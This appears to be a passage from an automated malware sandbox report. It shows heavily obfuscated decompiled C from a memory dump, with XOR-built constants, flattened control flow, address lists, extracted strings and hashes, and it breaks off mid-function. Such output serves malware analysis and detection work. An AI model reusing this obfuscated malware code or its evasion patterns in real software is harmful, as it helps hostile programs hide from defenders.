				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x397c28b5;
				_v116 = _v116 ^ 0x397d8e03;
				_v88 = 0x5c4384;
				_t409 = 0x45;
				_v88 = _v88 * 0x4b;
				_v88 = _v88 >> 3;
				_v88 = _v88 ^ 0x036acade;
				_v132 = 0xdc9e76;
				_v132 = _v132 + 0x5fbc;
				_v132 = _v132 + 0xffffe028;
				_v132 = _v132 >> 0xd;
				_v132 = _v132 ^ 0x000d0fa2;
				_v32 = 0x97e862;
				_v32 = _v32 / _t409;
				_v32 = _v32 ^ 0x000da538;
				_v148 = 0xb1ea20;
				_v148 = _v148 + 0x359b;
				_t410 = 0x4a;
				_v148 = _v148 / _t410;
				_t411 = 0x41;
				_v148 = _v148 / _t411;
				_v148 = _v148 ^ 0x000f649a;
				_v124 = 0xd281e8;
				_v124 = _v124 + 0xcbfa;
				_v124 = _v124 ^ 0xe68515a3;
				_t412 = 0x78;
				_v124 = _v124 / _t412;
				_v124 = _v124 ^ 0x01e3d78f;
				_v40 = 0xe4647b;
				_v40 = _v40 + 0x7bdf;
				_v40 = _v40 ^ 0x00e9fa9f;
				_v68 = 0xbae5b7;
				_v68 = _v68 >> 1;
				_v68 = _v68 << 0xb;
				_v68 = _v68 ^ 0xeb9bf681;
				_v156 = 0x3df4c5;
				_v156 = _v156 >> 0x10;
				_v156 = _v156 ^ 0x4d671b52;
				_v156 = _v156 + 0xffffa9c9;
				_v156 = _v156 ^ 0x4d625d37;
				_v140 = 0x18922;
				_v140 = _v140 ^ 0xe2fc11b8;
				_v140 = _v140 + 0x7ae7;
				_v140 = _v140 + 0x60b1;
				_v140 = _v140 ^ 0xe2f54784;
				_v164 = 0x68a3f0;
				_t413 = 0x25;
				_v164 = _v164 / _t413;
				_v164 = _v164 + 0xf64d;
				_v164 = _v164 >> 3;
				_v164 = _v164 ^ 0x00032fbb;
				_v56 = 0x19ee78;
				_v56 = _v56 << 0xe;
				_t414 = 0x16;
				_v56 = _v56 * 0x53;
				_v56 = _v56 ^ 0x1430917d;
				_v48 = 0x6a1470;
				_v48 = _v48 | 0xb57ddcff;
				_v48 = _v48 ^ 0xb5778c2e;
				_v60 = 0x2f0963;
				_v60 = _v60 >> 4;
				_v60 = _v60 * 0x75;
				_v60 = _v60 ^ 0x01535e9b;
				_v104 = 0xb58208;
				_v104 = _v104 ^ 0x5d36887e;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x0a72eef6;
				_v52 = 0x4918ce;
				_v52 = _v52 << 0xd;
				_v52 = _v52 ^ 0xaaee712b;
				_v52 = _v52 ^ 0x89f52d6f;
				_v96 = 0xf373d3;
				_v96 = _v96 / _t414;
				_v96 = _v96 << 0xe;
				_v96 = _v96 ^ 0xc4345706;
				_v76 = 0xfa3435;
				_t415 = 0x67;
				_v76 = _v76 / _t415;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x00006f2d;
				_v20 = 0xae808a;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x001c6c14;
				_v92 = 0x44420d;
				_t416 = 0x7b;
				_v92 = _v92 / _t416;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x0008631e;
				_v160 = 0x1e9b14;
				_v160 = _v160 << 1;
				_v160 = _v160 + 0x6acb;
				_v160 = _v160 | 0x2b135b1a;
				_v160 = _v160 ^ 0x2b39dc63;
				_v152 = 0xaf56a0;
				_v152 = _v152 + 0xffff61d0;
				_v152 = _v152 * 0x36;
				_v152 = _v152 >> 6;
				_v152 = _v152 ^ 0x0091b7f7;
				_v112 = 0xda5cef;
				_t417 = 0x5c;
				_v112 = _v112 * 0x5f;
				_v112 = _v112 | 0xc5775f64;
				_v112 = _v112 ^ 0xd57f0cd3;
				_v100 = 0xa51ea2;
				_v100 = _v100 << 0xc;
				_v100 = _v100 | 0xba023f10;
				_v100 = _v100 ^ 0xfbee3b1d;
				_v108 = 0x588e05;
				_v108 = _v108 / _t417;
				_t418 = 0x50;
				_v108 = _v108 * 0x2d;
				_v108 = _v108 ^ 0x002eb57d;
				_v72 = 0xd354ff;
				_v72 = _v72 << 7;
				_v72 = _v72 + 0x53f7;
				_v72 = _v72 ^ 0x69a72a70;
				_v64 = 0x7a83a6;
				_v64 = _v64 + 0x2d14;
				_v64 = _v64 + 0xffffec8a;
				_v64 = _v64 ^ 0x007c9d2a;
				_v168 = 0xa627fa;
				_v168 = _v168 + 0xffff97ca;
				_v168 = _v168 + 0xc15c;
				_v168 = _v168 * 0x1e;
				_v168 = _v168 ^ 0x1383a277;
				_v80 = 0xe60465;
				_v80 = _v80 | 0xce5ceabc;
				_v80 = _v80 * 0x7d;
				_v80 = _v80 ^ 0x1277eb64;
				_v128 = 0x2eade2;
				_v128 = _v128 << 0xd;
				_v128 = _v128 << 0xa;
				_v128 = _v128 + 0x3783;
				_v128 = _v128 ^ 0xf1097c2e;
				_v36 = 0x48cfcc;
				_v36 = _v36 * 0x62;
				_v36 = _v36 ^ 0x1bda1686;
				_v136 = 0x7c01b2;
				_v136 = _v136 << 2;
				_v136 = _v136 >> 0xb;
				_v136 = _v136 / _t418;
				_v136 = _v136 ^ 0x0001542c;
				_v44 = 0xf72617;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x00073da0;
				_t459 = _v12;
				while(1) {
					L1:
					_t385 = _v120;
					while(1) {
						L2:
						_t449 = 0xf415efc;
						while(1) {
							L3:
							_t419 = _v144;
							while(1) {
								L4:
								_t473 = _t462 - 0xb1ef800;
								if(_t473 > 0) {
									break;
								}
								if(_t473 == 0) {
									E00BBF699(_v72, _t467, _v64, _v168, _v80);
									_t469 =  &(_t469[3]);
									_t462 = 0x752064a;
									goto L1;
								} else {
									if(_t462 == 0x33609d5) {
										_push(_t419);
										_t467 = E00BC6F53(0x2000);
										_t462 =  !=  ? 0x5f8bdac : 0x752064a;
										while(1) {
											L1:
											_t385 = _v120;
											goto L2;
										}
									} else {
										if(_t462 == 0x5943c55) {
											_push(_t419);
											_t385 = E00BC6F53(0x20000);
											_t407 = _t385;
											if(_t407 != 0) {
												_t462 = 0x33609d5;
												while(1) {
													L1:
													_t385 = _v120;
													goto L2;
												}
											}
										} else {
											if(_t462 == 0x5cfb4e3) {
												_t419 = E00BBC38F(_v52, _v28, _v16, _v96,  *_t459);
												_t469 =  &(_t469[3]);
												_t385 = _v120;
												_v144 = _t419;
												_t449 = 0xf415efc;
												_t462 =  !=  ? 0xf415efc : 0xfbae4fa;
												continue;
											} else {
												_t385 = 0x5f8bdac;
												if(_t462 == 0x5f8bdac) {
													_push(_t419);
													_push(_v48);
													_push(_v56);
													_push(_v164);
													_push( &_v8);
													_push(_v140);
													_push(_v16);
													_push(_t419);
													_push(_v156);
													_push(_v68);
													_push( &_v12);
													_push(_v40);
													_push(_v124);
													_push(_t407);
													_t400 = E00BD2398(_t419, _v148);
													_t469 = _t469 - 0xc + 0x44;
													if(_t400 == 0) {
														L27:
														_t462 = 0xb1ef800;
														while(1) {
															L1:
															_t385 = _v120;
															goto L2;
														}
													} else {
														_t403 = E00BBC52A();
														_t462 = 0x5cfb4e3;
														_t385 = _v12 * 0x2c + _t407;
														_v120 = _t385;
														_t459 =  >=  ? _t407 : (_t403 & 0x0000001f) * 0x2c + _t407;
														L2:
														_t449 = 0xf415efc;
														goto L3;
													}
													L31:
												} else {
													if(_t462 == 0x752064a) {
														return E00BBF699(_v128, _t407, _v36, _v136, _v44);
													}
													L29:
													if(_t462 != 0xe79a120) {
														_t385 = _v120;
														L3:
														_t419 = _v144;
														continue;
													}
												}
											}
										}
									}
								}
								L12:
								return _t385;
								goto L31;
							}
							if(_t462 == 0xb622cd8) {
								_t462 = 0x5943c55;
								goto L29;
							} else {
								if(_t462 == 0xe1582d4) {
									E00BB53D6(_a4, _v100, _t467, _v24, _v108);
									_t469 =  &(_t469[3]);
									goto L27;
								} else {
									if(_t462 == _t449) {
										E00BD1BB6(_v76, _t467, _v84, _v20, _v92,  &_v4, _t419, _t419, _v160);
										_t462 =  !=  ? 0xe1582d4 : 0xfbae4fa;
										_t385 = E00BB7CC1(_v144, _v152, _v112);
										_t469 =  &(_t469[8]);
										_t449 = 0xf415efc;
										goto L29;
									} else {
										if(_t462 != 0xfbae4fa) {
											goto L29;
										} else {
											_t459 = _t459 + 0x2c;
											asm("sbb esi, esi");
											_t462 = (_t462 & 0xfab0bce3) + 0xb1ef800;
											goto L4;
										}
									}
								}
							}
							goto L12;
						}
					}
				}
			}

0x00bc313a
0x00bc3143
0x00bc314a
0x00bc3151
0x00bc3158
0x00bc315a
0x00bc315f
0x00bc3167
0x00bc316a
0x00bc3174
0x00bc317c
0x00bc317e
0x00bc3186
0x00bc3188
0x00bc3193
0x00bc3198
0x00bc31a3
0x00bc31ae
0x00bc31b9
0x00bc31c1
0x00bc31cc
0x00bc31d4
0x00bc31d9
0x00bc31e1
0x00bc31e9
0x00bc31f8
0x00bc31fb
0x00bc31ff
0x00bc3204
0x00bc320c
0x00bc3214
0x00bc321c
0x00bc3224
0x00bc3229
0x00bc3231
0x00bc3247
0x00bc324e
0x00bc3259
0x00bc3261
0x00bc326d
0x00bc3272
0x00bc327c
0x00bc3281
0x00bc3287
0x00bc328f
0x00bc3297
0x00bc329f
0x00bc32ab
0x00bc32ae
0x00bc32b2
0x00bc32ba
0x00bc32c5
0x00bc32d0
0x00bc32db
0x00bc32e3
0x00bc32e7
0x00bc32ec
0x00bc32f4
0x00bc32fc
0x00bc3303
0x00bc330b
0x00bc3313
0x00bc331b
0x00bc3323
0x00bc332b
0x00bc3333
0x00bc333b
0x00bc3343
0x00bc3351
0x00bc3356
0x00bc335c
0x00bc3364
0x00bc3369
0x00bc3371
0x00bc337c
0x00bc338c
0x00bc338f
0x00bc3396
0x00bc33a1
0x00bc33ac
0x00bc33b7
0x00bc33c2
0x00bc33cd
0x00bc33dd
0x00bc33e4
0x00bc33ef
0x00bc33f7
0x00bc33ff
0x00bc3404
0x00bc340c
0x00bc3417
0x00bc341f
0x00bc342a
0x00bc3435
0x00bc3445
0x00bc3449
0x00bc344e
0x00bc3456
0x00bc3462
0x00bc3467
0x00bc346d
0x00bc3472
0x00bc347a
0x00bc3485
0x00bc348d
0x00bc3498
0x00bc34a4
0x00bc34a7
0x00bc34ab
0x00bc34b0
0x00bc34b8
0x00bc34c0
0x00bc34c4
0x00bc34cc
0x00bc34d4
0x00bc34dc
0x00bc34e4
0x00bc34f1
0x00bc34f5
0x00bc34fa
0x00bc3502
0x00bc3513
0x00bc3516
0x00bc351a
0x00bc3522
0x00bc352a
0x00bc3532
0x00bc3537
0x00bc353f
0x00bc3547
0x00bc3557
0x00bc3560
0x00bc3561
0x00bc3565
0x00bc356d
0x00bc3575
0x00bc357a
0x00bc3582
0x00bc358a
0x00bc3592
0x00bc359a
0x00bc35a2
0x00bc35aa
0x00bc35b2
0x00bc35ba
0x00bc35c7
0x00bc35cb
0x00bc35d3
0x00bc35db
0x00bc35e8
0x00bc35ec
0x00bc35f4
0x00bc35fc
0x00bc3601
0x00bc3606
0x00bc360e
0x00bc3616
0x00bc3629
0x00bc3630
0x00bc363b
0x00bc3643
0x00bc3648
0x00bc3653
0x00bc3657
0x00bc365f
0x00bc366a
0x00bc3672
0x00bc367d
0x00bc3684
0x00bc3684
0x00bc3684
0x00bc3688
0x00bc3688
0x00bc3688
0x00bc368d
0x00bc368d
0x00bc368d
0x00bc3691
0x00bc3691
0x00bc3691
0x00bc3697
0x00000000
0x00000000
0x00bc369d
0x00bc3841
0x00bc3846
0x00bc3849
0x00000000
0x00bc36a3
0x00bc36a9
0x00bc380f
0x00bc3815
0x00bc3824
0x00bc3684
0x00bc3684
0x00bc3684
0x00000000
0x00bc3684
0x00bc36af
0x00bc36b5
0x00bc37e4
0x00bc37e5
0x00bc37ea
0x00bc37ef
0x00bc37f5
0x00bc3684
0x00bc3684
0x00bc3684
0x00000000
0x00bc3684
0x00bc3684
0x00bc36bb
0x00bc36c1
0x00bc37b6
0x00bc37b8
0x00bc37bb
0x00bc37c6
0x00bc37ca
0x00bc37cf
0x00000000
0x00bc36c7
0x00bc36c7
0x00bc36ce
0x00bc3707
0x00bc3708
0x00bc3716
0x00bc371d
0x00bc3721
0x00bc3722
0x00bc372d
0x00bc3734
0x00bc3735
0x00bc3739
0x00bc3740
0x00bc3741
0x00bc374b
0x00bc3753
0x00bc3754
0x00bc3759
0x00bc375e
0x00bc3903
0x00bc3903
0x00bc3684
0x00bc3684
0x00bc3684
0x00000000
0x00bc3684
0x00bc3764
0x00bc376c
0x00bc3774
0x00bc3786
0x00bc378a
0x00bc378e
0x00bc3688
0x00bc3688
0x00000000
0x00bc3688
0x00000000
0x00bc36d0
0x00bc36d6
0x00000000
0x00bc36f9
0x00bc3912
0x00bc3918
0x00bc391e
0x00bc368d
0x00bc368d
0x00000000
0x00bc368d
0x00bc3918
0x00bc36ce
0x00bc36c1
0x00bc36b5
0x00bc36a9
0x00bc3706
0x00bc3706
0x00000000
0x00bc3706
0x00bc3859
0x00bc390d
0x00000000
0x00bc385f
0x00bc3865
0x00bc38fb
0x00bc3900
0x00000000
0x00bc3867
0x00bc3869
0x00bc38b5
0x00bc38d2
0x00bc38d5
0x00bc38da
0x00bc38dd
0x00000000
0x00bc386b
0x00bc3871
0x00000000
0x00bc3877
0x00bc3877
0x00bc387c
0x00bc3884
0x00000000
0x00bc3884
0x00bc3871
0x00bc3869
0x00bc3865
0x00000000
0x00bc3859
0x00bc368d
0x00bc3688

Strings

c/, xrefs: 00BC33C2
-o, xrefs: 00BC3472
{d, xrefs: 00BC32BA
BD, xrefs: 00BC3498
z, xrefs: 00BC332B
7]bM, xrefs: 00BC3313

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: BD$-o$7]bM$c/${d$z
API String ID: 0-1369920251
Opcode ID: 0978cbd6e6b2e58b4b5b5a330a28090e9600e36508660258ce69f92898b9e1cc
Instruction ID: f0ac705273b605069d8bc16c420836dffe009999abbf3aaf07b98c1c39c1a0b3
Opcode Fuzzy Hash: 0978cbd6e6b2e58b4b5b5a330a28090e9600e36508660258ce69f92898b9e1cc
Instruction Fuzzy Hash: 5F1223729083809FD368DF25C48AA4BFBE2FBD4744F50892DE59A86260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB12E, Relevance: 7.8, Strings: 6, Instructions: 313
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00BBB12E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				void* _t327;
				void* _t345;
				void* _t360;
				void* _t370;
				void* _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int* _t414;

				_push(_a12);
				_t403 = 0;
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00BB8002(_t327);
				_v1640 = 0x18960f;
				_t414 =  &(( &_v1700)[5]);
				_v1640 = _v1640 + 0xffffb0ef;
				_v1640 = _v1640 << 0xc;
				_t370 = 0x40cc407;
				_v1640 = _v1640 ^ 0x846fe029;
				_v1700 = 0x39ddee;
				_t404 = 0x21;
				_v1700 = _v1700 / _t404;
				_v1700 = _v1700 ^ 0x36b039b0;
				_v1700 = _v1700 + 0xb30d;
				_v1700 = _v1700 ^ 0x36b91bbb;
				_v1568 = 0xc57699;
				_v1568 = _v1568 | 0xde2d581e;
				_v1568 = _v1568 ^ 0xdeecc176;
				_v1676 = 0x38b08;
				_v1676 = _v1676 | 0xf4302328;
				_v1676 = _v1676 + 0xffff874d;
				_v1676 = _v1676 << 7;
				_v1676 = _v1676 ^ 0x199d7f00;
				_v1644 = 0x234753;
				_v1644 = _v1644 << 1;
				_v1644 = _v1644 >> 4;
				_v1644 = _v1644 ^ 0x000c23d7;
				_v1580 = 0x673aaf;
				_v1580 = _v1580 ^ 0x34ed9787;
				_v1580 = _v1580 ^ 0x3488862c;
				_v1636 = 0xf7aa52;
				_v1636 = _v1636 + 0xffff1d5d;
				_v1636 = _v1636 ^ 0x5c96da78;
				_v1636 = _v1636 ^ 0x5c67c57e;
				_v1696 = 0x2ba240;
				_v1696 = _v1696 + 0x9342;
				_v1696 = _v1696 + 0xffff922e;
				_v1696 = _v1696 | 0x53158430;
				_v1696 = _v1696 ^ 0x533ec6dc;
				_v1620 = 0xaf3ee9;
				_v1620 = _v1620 ^ 0x92eaab44;
				_v1620 = _v1620 << 5;
				_v1620 = _v1620 ^ 0x48b79e43;
				_v1672 = 0xc87889;
				_v1672 = _v1672 + 0x4cd9;
				_t405 = 0x39;
				_v1672 = _v1672 / _t405;
				_t406 = 0x44;
				_v1672 = _v1672 / _t406;
				_v1672 = _v1672 ^ 0x0001ff53;
				_v1596 = 0x377225;
				_t91 =  &_v1596; // 0x377225
				_v1596 =  *_t91 * 0x4e;
				_v1596 = _v1596 ^ 0x10e1c91c;
				_v1680 = 0xe27471;
				_v1680 = _v1680 + 0xffff2065;
				_v1680 = _v1680 >> 7;
				_v1680 = _v1680 + 0xffffc813;
				_v1680 = _v1680 ^ 0x0002d255;
				_v1628 = 0x5ed929;
				_v1628 = _v1628 | 0xad2692f3;
				_v1628 = _v1628 + 0x517;
				_v1628 = _v1628 ^ 0xad7c7db5;
				_v1688 = 0x6ab477;
				_v1688 = _v1688 | 0x3f0ac8dc;
				_v1688 = _v1688 >> 5;
				_t407 = 0x7c;
				_v1688 = _v1688 / _t407;
				_v1688 = _v1688 ^ 0x0002b8e2;
				_v1656 = 0xe49201;
				_v1656 = _v1656 >> 4;
				_v1656 = _v1656 ^ 0x3cbba8d3;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x00748e21;
				_v1664 = 0x256d36;
				_v1664 = _v1664 << 1;
				_v1664 = _v1664 + 0x5c98;
				_v1664 = _v1664 ^ 0xc01eb017;
				_v1664 = _v1664 ^ 0xc05621bd;
				_v1592 = 0x91f22b;
				_v1592 = _v1592 << 0xc;
				_v1592 = _v1592 ^ 0x1f2b170f;
				_v1692 = 0x16e027;
				_t408 = 0x73;
				_v1692 = _v1692 * 0x7d;
				_v1692 = _v1692 + 0xffff2548;
				_v1692 = _v1692 + 0x7814;
				_v1692 = _v1692 ^ 0x0b2a74ae;
				_v1660 = 0xb8ca0;
				_v1660 = _v1660 << 6;
				_v1660 = _v1660 << 0xb;
				_v1660 = _v1660 >> 0xc;
				_v1660 = _v1660 ^ 0x0005feb5;
				_v1652 = 0x2cd3d3;
				_v1652 = _v1652 ^ 0xb56fc636;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 << 0xe;
				_v1652 = _v1652 ^ 0x4312db53;
				_v1588 = 0x5b8b95;
				_v1588 = _v1588 >> 0xc;
				_v1588 = _v1588 ^ 0x00058c29;
				_v1608 = 0x6bf905;
				_v1608 = _v1608 + 0x1dd8;
				_v1608 = _v1608 ^ 0x7879ae36;
				_v1608 = _v1608 ^ 0x781b9945;
				_v1684 = 0xb0eab7;
				_v1684 = _v1684 << 3;
				_v1684 = _v1684 + 0xffff1ea1;
				_v1684 = _v1684 << 0x10;
				_v1684 = _v1684 ^ 0x7459ce5d;
				_v1668 = 0x95954;
				_v1668 = _v1668 ^ 0x32c7f21e;
				_v1668 = _v1668 >> 9;
				_v1668 = _v1668 + 0xffffc043;
				_v1668 = _v1668 ^ 0x00154acf;
				_v1624 = 0x432a00;
				_v1624 = _v1624 << 3;
				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x560db6e1;
				_v1600 = 0x795bd7;
				_v1600 = _v1600 / _t408;
				_v1600 = _v1600 ^ 0x00012ac5;
				_v1572 = 0x1651c3;
				_t409 = 9;
				_v1572 = _v1572 / _t409;
				_v1572 = _v1572 ^ 0x0002bbb3;
				_v1616 = 0xf27097;
				_v1616 = _v1616 >> 4;
				_v1616 = _v1616 >> 0xe;
				_v1616 = _v1616 ^ 0x0004dce6;
				_v1564 = 0x3952dd;
				_v1564 = _v1564 >> 4;
				_v1564 = _v1564 ^ 0x00037304;
				_v1632 = 0x98205d;
				_v1632 = _v1632 + 0xffffdd70;
				_v1632 = _v1632 | 0x8176cca4;
				_v1632 = _v1632 ^ 0x81f1375f;
				_v1576 = 0x8e05bb;
				_v1576 = _v1576 + 0xffff12be;
				_v1576 = _v1576 ^ 0x00806783;
				_v1604 = 0x990a6a;
				_v1604 = _v1604 + 0x8087;
				_v1604 = _v1604 >> 0x10;
				_v1604 = _v1604 ^ 0x000f17c6;
				_v1612 = 0x37d2a3;
				_v1612 = _v1612 + 0xffffb6cc;
				_v1612 = _v1612 ^ 0xfd8cca57;
				_v1612 = _v1612 ^ 0xfdbdfa1f;
				_v1584 = 0xf67908;
				_v1584 = _v1584 + 0xa160;
				_v1584 = _v1584 ^ 0x00fe742e;
				_v1648 = 0x27ed76;
				_v1648 = _v1648 * 0x1f;
				_v1648 = _v1648 >> 0xe;
				_v1648 = _v1648 >> 5;
				_v1648 = _v1648 ^ 0x000749b3;
				do {
					while(_t370 != 0x2de4606) {
						if(_t370 == 0x40cc407) {
							_push(_t370);
							E00BBE259(_v1700, _v1640, _v1568, _v1676, _t370, _t370,  &_v1040, _v1644, _v1580);
							_t414 =  &(_t414[8]);
							_t370 = 0x2de4606;
							continue;
						} else {
							if(_t370 == 0x476bc3c) {
								_push(_v1648);
								_push( &_v520);
								_push(_t403);
								_push(_v1584);
								_push(_v1612);
								_push(_v1604);
								_push(_t403);
								_push(_t403);
								__eflags = E00BD06EF(_v1576, __eflags);
								_t403 =  !=  ? 1 : _t403;
							} else {
								_t420 = _t370 - 0xe706352;
								if(_t370 != 0xe706352) {
									goto L8;
								} else {
									_push(0xbb155c);
									_t360 = E00BD0AD3(_v1692, _v1660, _t420);
									E00BD2C16( &_v1560, _t420);
									E00BB238A( *0xbd5bd8 + 0x238, _t360,  &_v1040, _t403,  &_v1560,  *0xbd5bd8 + 0x30, _v1588, _v1608, _v1684,  &_v520, _v1668, _v1624, _v1600, _v1572);
									E00BC2EED(_v1616, _v1564, _v1632, _t360);
									_t414 =  &(_t414[0x10]);
									_t370 = 0x476bc3c;
									continue;
								}
							}
						}
						L11:
						return _t403;
					}
					_push(0xbb144c);
					_t345 = E00BD0AD3(_v1636, _v1696, __eflags);
					E00BD2C16( &_v1560, __eflags);
					__eflags =  *0xbd5bd8 + 0x238;
					E00BCB062( &_v520,  *0xbd5bd8 + 0x238,  *0xbd5bd8 + 0x238, _v1672, _v1596, _t345, _v1680, 0x104, _v1628,  *0xbd5bd8 + 0x30,  &_v1560,  &_v1040, _v1688);
					E00BC2EED(_v1656, _v1664, _v1592, _t345);
					_t414 =  &(_t414[0xe]);
					_t370 = 0x476bc3c;
					L8:
					__eflags = _t370 - 0x3c4b149;
				} while (__eflags != 0);
				goto L11;
			}

0x00bbb138
0x00bbb13f
0x00bbb141
0x00bbb148
0x00bbb14f
0x00bbb150
0x00bbb151
0x00bbb156
0x00bbb15e
0x00bbb161
0x00bbb16b
0x00bbb170
0x00bbb175
0x00bbb17d
0x00bbb18b
0x00bbb190
0x00bbb196
0x00bbb19e
0x00bbb1a6
0x00bbb1ae
0x00bbb1b9
0x00bbb1c4
0x00bbb1cf
0x00bbb1d7
0x00bbb1df
0x00bbb1e7
0x00bbb1ec
0x00bbb1f4
0x00bbb1fc
0x00bbb200
0x00bbb205
0x00bbb20d
0x00bbb218
0x00bbb223
0x00bbb22e
0x00bbb236
0x00bbb23e
0x00bbb246
0x00bbb24e
0x00bbb256
0x00bbb25e
0x00bbb266
0x00bbb26e
0x00bbb276
0x00bbb27e
0x00bbb286
0x00bbb28b
0x00bbb293
0x00bbb29b
0x00bbb2a7
0x00bbb2ac
0x00bbb2b6
0x00bbb2b9
0x00bbb2bd
0x00bbb2c5
0x00bbb2cd
0x00bbb2d2
0x00bbb2d6
0x00bbb2de
0x00bbb2e6
0x00bbb2ee
0x00bbb2f3
0x00bbb2fb
0x00bbb303
0x00bbb30b
0x00bbb313
0x00bbb31d
0x00bbb325
0x00bbb32d
0x00bbb335
0x00bbb340
0x00bbb345
0x00bbb34b
0x00bbb353
0x00bbb35b
0x00bbb360
0x00bbb368
0x00bbb36d
0x00bbb375
0x00bbb37d
0x00bbb381
0x00bbb389
0x00bbb391
0x00bbb399
0x00bbb3a4
0x00bbb3ac
0x00bbb3b7
0x00bbb3c4
0x00bbb3c7
0x00bbb3cb
0x00bbb3d3
0x00bbb3db
0x00bbb3e3
0x00bbb3eb
0x00bbb3f0
0x00bbb3f5
0x00bbb3fa
0x00bbb402
0x00bbb40a
0x00bbb412
0x00bbb417
0x00bbb41c
0x00bbb424
0x00bbb42f
0x00bbb437
0x00bbb442
0x00bbb44a
0x00bbb452
0x00bbb45a
0x00bbb462
0x00bbb46a
0x00bbb46f
0x00bbb477
0x00bbb47c
0x00bbb484
0x00bbb48c
0x00bbb494
0x00bbb499
0x00bbb4a1
0x00bbb4a9
0x00bbb4b1
0x00bbb4bb
0x00bbb4bf
0x00bbb4c7
0x00bbb4d7
0x00bbb4db
0x00bbb4e3
0x00bbb4f5
0x00bbb4f8
0x00bbb4ff
0x00bbb50a
0x00bbb512
0x00bbb517
0x00bbb521
0x00bbb52e
0x00bbb539
0x00bbb541
0x00bbb54c
0x00bbb554
0x00bbb55c
0x00bbb564
0x00bbb56c
0x00bbb577
0x00bbb582
0x00bbb58d
0x00bbb595
0x00bbb59d
0x00bbb5a2
0x00bbb5aa
0x00bbb5b2
0x00bbb5ba
0x00bbb5c2
0x00bbb5ca
0x00bbb5d5
0x00bbb5e0
0x00bbb5eb
0x00bbb5f8
0x00bbb5fc
0x00bbb601
0x00bbb606
0x00bbb60e
0x00bbb60e
0x00bbb61c
0x00bbb6d3
0x00bbb6fc
0x00bbb701
0x00bbb704
0x00000000
0x00bbb622
0x00bbb624
0x00bbb7a7
0x00bbb7b2
0x00bbb7b3
0x00bbb7b4
0x00bbb7bb
0x00bbb7bf
0x00bbb7cd
0x00bbb7ce
0x00bbb7da
0x00bbb7dc
0x00bbb62a
0x00bbb62a
0x00bbb630
0x00000000
0x00bbb636
0x00bbb63e
0x00bbb643
0x00bbb651
0x00bbb6a9
0x00bbb6c4
0x00bbb6c9
0x00bbb6cc
0x00000000
0x00bbb6cc
0x00bbb630
0x00bbb624
0x00bbb7df
0x00bbb7eb
0x00bbb7eb
0x00bbb713
0x00bbb718
0x00bbb726
0x00bbb774
0x00bbb77a
0x00bbb78f
0x00bbb794
0x00bbb797
0x00bbb799
0x00bbb799
0x00bbb799
0x00000000

Strings

v', xrefs: 00BBB5EB
qt, xrefs: 00BBB2DE
SG#, xrefs: 00BBB1F4
6m%, xrefs: 00BBB375
%r7, xrefs: 00BBB2CD
TY, xrefs: 00BBB484

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %r7$6m%$SG#$TY$qt$v'
API String ID: 0-3237691032
Opcode ID: 84baa320986332afe2969fcefc09516b57a57fd292aa06fd5a41ca3df1226a16
Instruction ID: 7fc652acf8e6853c3017d50742b3e1e08629417da35312b3dc6929374d0692ab
Opcode Fuzzy Hash: 84baa320986332afe2969fcefc09516b57a57fd292aa06fd5a41ca3df1226a16
Instruction Fuzzy Hash: 27F1FEB14093809FD365DF61C98AA9BBBF1BBC1748F10891DF2DA86220D7B58909CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD899, Relevance: 7.8, Strings: 6, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BBD899(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t274;
				void* _t281;
				void* _t286;
				void* _t291;
				void* _t297;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				void* _t311;
				void* _t341;
				intOrPtr _t342;
				signed int* _t344;
				void* _t351;

				_t344 =  &_v120;
				_v16 = 0xb8724b;
				_v12 = 0x4d7ece;
				_t342 = 0;
				_t341 = __ecx;
				_v8 = 0;
				_t311 = 0x6de8da5;
				_v4 = 0;
				_v28 = 0x22b23d;
				_t299 = 0x7b;
				_v28 = _v28 / _t299;
				_v28 = _v28 ^ 0x00000479;
